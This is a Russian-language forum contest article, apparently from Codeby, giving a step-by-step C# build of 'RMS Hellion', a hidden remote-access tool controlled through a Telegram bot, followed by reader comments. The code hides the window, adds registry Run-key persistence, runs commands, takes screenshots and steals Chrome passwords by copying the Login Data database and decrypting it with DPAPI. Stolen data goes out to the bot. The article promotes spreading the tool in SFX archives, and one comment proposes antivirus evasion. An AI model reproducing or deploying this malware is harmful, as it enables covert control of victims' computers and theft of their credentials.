Конкурс RMS Hellion - Telegram

Статья для участия в Конкурсе программистов
RMS Hellion, управление которой происходит через Telegram бота. Производства отечественной компании(то есть чисто меня) специально для Codeby.
Введение

Всем доброго времени суток. Это моя первая статья, поэтому прошу простить мне какие-нибудь неточности. Начну с того почему я выбрал способ управление зараженной машиной, именно, через Telegram Bot. Все очень просто, во-первых нам не нужно думать о серверах, сокетах и прочих вещах. Во-вторых мы можем с любого устройства управлять машиной(так как все происходит через умного бота).
  • Возможность скрытой установки и работы;
  • Связь через Telegram;
  • Файлы самой программы не детектируются;
  • Авто запуск при старте системы;
  • Сбор сведений;
  • Выполнение CMD команд;
  • Работа с файлами;
  • Захват экрана;
  • Кража паролей(Chrome);
  • Простота использования;
1544416426023.png


1544416446050.png
Теперь я расскажу как его можно распространять. Весь наш проект будет лежать в SFX архиве, так как софт самописный, то он пока абсолютно чистый. Но вам никто не мешает его закриптовать(Расскажу как это сделать в следующих статьях). В помощь есть много уроков как создать и работать с SFX архивом.
Начинаем кодить
Шаг первый. Создаем оформление бота через Botfather
BotFather — это бот, через которого регистрируют все остальные боты. Давайте откроем telegram и перейдем по ссылке — BotFather
Собственно сейчас нас интересует команда /newbot, пишем ее и создаем бота указывая его название. Я назову своего бота — Hellion. Нам выдадут токен. Создаем пустой проект WinForms C#, создаем класс Data, где мы будем хранить важные данные и вставляем туда наш токен. Пишем в стиле ООП.
C#:
class Data
    {
        private String _Token = ""; //переменная для хранения токена
        public String getToken()
        {
            return _Token;
        }
    }
Шаг второй. Подключаем все и вся.
Пишем под Visual Studio 2017. Нам необходимо подключить библиотеки.
  • Telegram.Bot;
  • System.Data.SQLite;
  • System.Security.Cryptography.ProtectedData
Шаг третий. Настройка формы
Наша задача сделать форму прозрачной(Opacity 0%), FormBorderStyle(None) и с минимальными размерами Size(0;0), также убираем видимость в панеле задач ShowTaskBar(False)
1544417904522.png


1544417942003.png
Шаг четвертый. Общение с ботом
Наша задача создать worker который будет асинхронно получать команды от бота и их обрабатывать. Открываем главный класс и вставляем:
C#:
BackgroundWorker _bw;
public Hellion()
        {
            InitializeComponent();
            this._bw = new BackgroundWorker();
            this._bw.DoWork += this.Work; //сам метод который будет работать асинхронно

            if (this._bw.IsBusy != true) this._bw.RunWorkerAsync(); //если у нас нет копии воркера то запускаем
        }
Теперь в нашем асинхронном методе будем работать с API Telegram. Вставляем:
C#:
async void Work(object sender, DoWorkEventArgs e)
        {
            var worker = sender as BackgroundWorker; //ссылка на вызвавший событие
            Data _data = new Data(); //экземпляр класса Data для получение токена
            var _key = _data.getToken(); //сам токен
            try
            {
                var _bot = new Telegram.Bot.TelegramBotClient(_key); //инициализация API
                await _bot.SetWebhookAsync("");
                int _offset = 0; //переменная для хранение последненго id сообщения
                //бесконечный цикл
                while (true)
                {
                    var _updates = await _bot.GetUpdatesAsync(_offset); //что-то вроде списка обновлений
                    foreach (var _update in _updates)
                    {
                        var _msg = _update.Message; //получаем обьект - сообщение
                        _chatId = _msg.Chat.Id; //присваеваем переменной id чата

                        if (_msg.Type == Telegram.Bot.Types.Enums.MessageType.Text)
                        {
...
Почти все готово. Следующий шаг это кусок с if else который будет сравнивать наши команды и в зависимости от команды выполнять то или иное действие. Реализуем это с помощью отдельного класса CompareString
C#:
class CompareString
    {
        public bool compare(String temp1, String temp2)
        {
            //проверка содержиться ли в temp1 текст temp2
            //+ переводим в нижний регистр
            if (temp1.ToLower().Contains(temp2.ToLower())) return true; else return false;
        }
    }
Шаг пятый. Reply кнопки
1544418524155.png
Посмотрим как их создавать, для этого создаем класс ReplyBtn и вставляем:
C#:
_keyboardStart = new Telegram.Bot.Types.ReplyMarkups.ReplyKeyboardMarkup
            {
                Keyboard = new[]
                {
                    new[]
                    {
                        new Telegram.Bot.Types.ReplyMarkups.KeyboardButton("/Info"),
                        new Telegram.Bot.Types.ReplyMarkups.KeyboardButton("/Control"),
                        new Telegram.Bot.Types.ReplyMarkups.KeyboardButton("/Steal"),
                        new Telegram.Bot.Types.ReplyMarkups.KeyboardButton("/Help")
                    }
                },
                ResizeKeyboard = true
            };
То есть у нас получить большой список разных клавиатур. Давайте рассмотрим обработку одной из команд.
Код:
if (_compareString.compare(_msg.Text, "/start"))
                                _sendMsg.sendText(_chatId, "", _replyBtn.getKeyboardStart());
Что мы имеем? У нас есть метод класса CompareString который возвращает true/false в зависимости от того равны ли строки(не совсем так) в качестве аргументов у нас выступает _msg.Text(текст полученный от бота) и наша строка "/start". Затем я отправляю боту _sendMsg.sendText 2 аргумента id чата и нашу reply-клавиатуру. Взглянем на наш класс SendMsg
Код:
//отправка просто сообщения с текстом
        async public void sendText(Telegram.Bot.Types.ChatId _id, String _text)
        {
            if (!string.IsNullOrEmpty(_text.Trim(' ')))
            {
                var _bot = new Telegram.Bot.TelegramBotClient(_data.getToken()); //инициализация API
                await _bot.SetWebhookAsync("");
                await _bot.SendTextMessageAsync(_id, _text); //отправка сообщения боту
            }
            else
            {
                //какое-то действие если сообщение пустое
            }

        }
Шаг шестой. DPAPI и кража паролей Chrome
Data Protection API (DPAPI) — криптографический интерфейс программирования приложений в ОС семейства Windows, обеспечивающий защиту (конфиденциальность) данных путём их шифрования. Взято с вики не ругайтесь. Основная цель этой технологии защищать пароли без гемора для пользователя, но затруднять доступ для злоумышленников.
Если кто-то хочет узнать поподробнее, то вот держите - DPAPI на пальцах
. Теперь к сути, нам нужно достать файл с паролями. Храниться он в:"C:\Users\Codeby\AppData\Local\Google\Chrome\User Data\Default\". . По факту это простая sqlite база данных. Но есть одно НО пароли хранятся не в открытом виде, а нам нужно их достать и отправить. В таблице 'logins' нас будут интересовать следующие колонки origin_url (ссылка на сам сайт), username_value(логин), password_value(пароль) .
Опять создаем класс который будет извлекать и дешифровывать данные.
Кстати, прежде чем работать с БД, нам необходимо ее скопировать.
Объявление нужных переменных
Код:
private static String _pathLocalDB = @"Login Data"; //название БД
        private static String _pathSystemDB = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data"; //путь где лежит БД
        private static String _fieldDB = "logins"; //имя поле базы данных
        private static byte[] _entropy = null; //энторпия
Метод для копирование БД:
C#:
 private void copyDB()
        {
            System.IO.File.Copy(_pathSystemDB, "Login Data", true);
        }
Метод который будет дешифровывать наши пароли:
C#:
byte[] _byteArray = (byte[])record[2];
                    byte[] _dectypt = ProtectedData.Unprotect(_byteArray, _entropy, DataProtectionScope.CurrentUser);
                    String _password = new UTF8Encoding(true).GetString(_dectypt);
Для того чтобы получить расшифрованные пароли, нам необходимо воспользоваться методом ProtectedData.Unprotec, в качестве аргументов она принимает байты которые нам необходимо расшифровать, энтропию, и уникальные данные текущего ПК. Если кто-то не знает, то расшифровать пароли можно только на том ПК на которым они были зашифрованы.
Можно добавить расшифровку с браузера Firefox. Насколько я знаю — там используется алгоритм Triple-DES, а ключ находится в файле key3.db. Ну а пароли в signons.sqlite. Тем самым добавив функционал в RMS.
Шаг седьмой. Отправка скриншотов
Метод который делает скрин и сохраняет его:
Код:
Bitmap _bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
                Graphics _g = Graphics.FromImage(_bitmap as Image);
                _g.CopyFromScreen(0, 0, 0, 0, _bitmap.Size);
                Image _img = _bitmap;
                _img.Save("snap.png");

Метод в классе SendMsg который отправляет изображения:
C#:
async public void sendImage(Telegram.Bot.Types.ChatId _id, String _text, String _localPath)
        {
            var _bot = new Telegram.Bot.TelegramBotClient(_data.getToken()); //инициализация API
            await _bot.SetWebhookAsync("");
            try
            {
                using (System.IO.Stream stream = System.IO.File.OpenRead(_localPath))
                {
                    await _bot.SendPhotoAsync(
                    chatId: _id,
                    photo: stream,
                    caption: _text
                );
                }
            ...
Шаг восьмой. Реализация запуска при старте системы
C#:
class AutoRun
    {
        public AutoRun(bool autorun, String _name)
        {
            string ExePath = System.Windows.Forms.Application.ExecutablePath;
            RegistryKey reg;
            reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
            try
            {
                if (autorun) reg.SetValue(_name, ExePath);
                else reg.DeleteValue(_name);
                reg.Close();
            }
            catch{}
        }
    }
Шаг девятый. Сбор информации
Краткая информация о системе:
C#:
public String getInfoLittle()
        {
            if (System.IO.File.Exists("info.txt")) System.IO.File.Delete("info_small.txt");
                info_temp = "Версия Windows: " + Environment.OSVersion + "\n" +
                "64 Bit операционная система? : " + (Environment.Is64BitOperatingSystem ? "Да" : "Нет") + "\n" +
               "Имя компьютера : " + Environment.MachineName + "\n" +
                "Число процессоров : " + Environment.ProcessorCount + "\n" +
                "Системная папка : " + Environment.SystemDirectory + "\n" +
                "Логические диски :" + "\n" +
                 (String.Join(", ", Environment.GetLogicalDrives())
                .TrimEnd(',', ' ')
                .Replace("\\", String.Empty));
            using(System.IO.StreamWriter sw = new System.IO.StreamWriter("info_small.txt", false, Encoding.Default))
            {
                sw.WriteLine(info_temp);
            }
            return ("info_small.txt");
        }
Информация об установленном ПО:
C#:
public String getInfoApplications()
        {
            if (System.IO.File.Exists("info_app.txt")) System.IO.File.Delete("info_app.txt");
            ManagementObjectSearcher searcher_soft = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Product");
            foreach (ManagementObject queryObj in searcher_soft.Get())
            {
                info_temp += "<soft> Caption: {0} ; InstallDate: {1}</soft>" +
                                  queryObj["Caption"]+ queryObj["InstallDate"];
            }
            using(System.IO.StreamWriter sw = new System.IO.StreamWriter("info_app.txt", false, Encoding.Default))
            {
                sw.WriteLine(info_temp);
            }
            return "info_app.txt";
        }
Также имеется сбор информации о дисках, памяти, видео ядре и много другого
На этом все, теперь нам остается только собрать весь проект(мы получим наш заветный exe) и добавить в SFX архив с правильными настройками. ВАЖНО при добавление сего добра в архив, нам нужно также добавить библиотеки.

1544421179721.png


Исходники:
Сам готовый RMS:
Вот ссылка на бота, с помощью которого вы можете протестировать ПО - @hellion_admin_bot

Если будут вопросы, проблемы можно писать мне сюда либо в телеграмм @debug_x
Также могу приложить скрины как это выглядит прямо в Telegram Bot:

1544366324341.png


1544365934006.png


Видео по настройке

 
молодец, побольше бы таких тем для совсем новечков. + тебе в карму!)
 
Да смотрел Видео и кое что научился кототко чотко и ясно сам сделал Bot блогодоря тебе и и меня всё получилос и отлично работает спс тебе за видео и статья , И конечно отдельное блогодарност администраторру сайда за оргонизование этого конкурса
 
  • Нравится
Реакции: Debug
Да смотрел Видео и кое что научился кототко чотко и ясно сам сделал Bot блогодоря тебе и и меня всё получилос и отлично работает спс тебе за видео и статья , И конечно отдельное блогодарност администраторру сайда за оргонизование этого конкурса
Спасибо за отзыв
 
Плюсую, молодец, очень годно.
 
Последнее редактирование:
  • Переписать на C++ под WIN32API (для минимального размера бинаря),
  • Организовать антидетект
  • Защитить токен от красноглазиков с IDA/X64Dbg
  • Защитить панель в Телеграме от перебора username

И получится очень опасная штука с довольно оригинальной идеей ;)
 
Идея крутая, только исходники с гугл диска загрузить не получается
 
  • Нравится
Реакции: Debug
Здравствуй, такой вопрос- Асинхронный метод используется только для ускорения работы программы или же это как то еще влияет на детект и исользуется как доп защита от ав?
 
Здравствуй, такой вопрос- Асинхронный метод используется только для ускорения работы программы или же это как то еще влияет на детект и исользуется как доп защита от ав?
Асинхронный метод нужен для обработки команд от Telegram
 
Написал в личку
Извиняюсь, затупил, а осознал слишком поздно. Там просто Visual Studio. Во время сборки проекта появляются ошибки, от 7 до 41, и везде написано, что не видит некоторые файлы или определения . Эта ошибка появляется даже если собирать только что декомпилированный проект, т. е. ошибка в сборке появляется даже без изменения файлов. Декомпилировал с помощью dotPeek. В телеграме по адресу @debug_x какая-то группа на полтора человека. Скрин ошибки прилагаю.
1578837022869.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!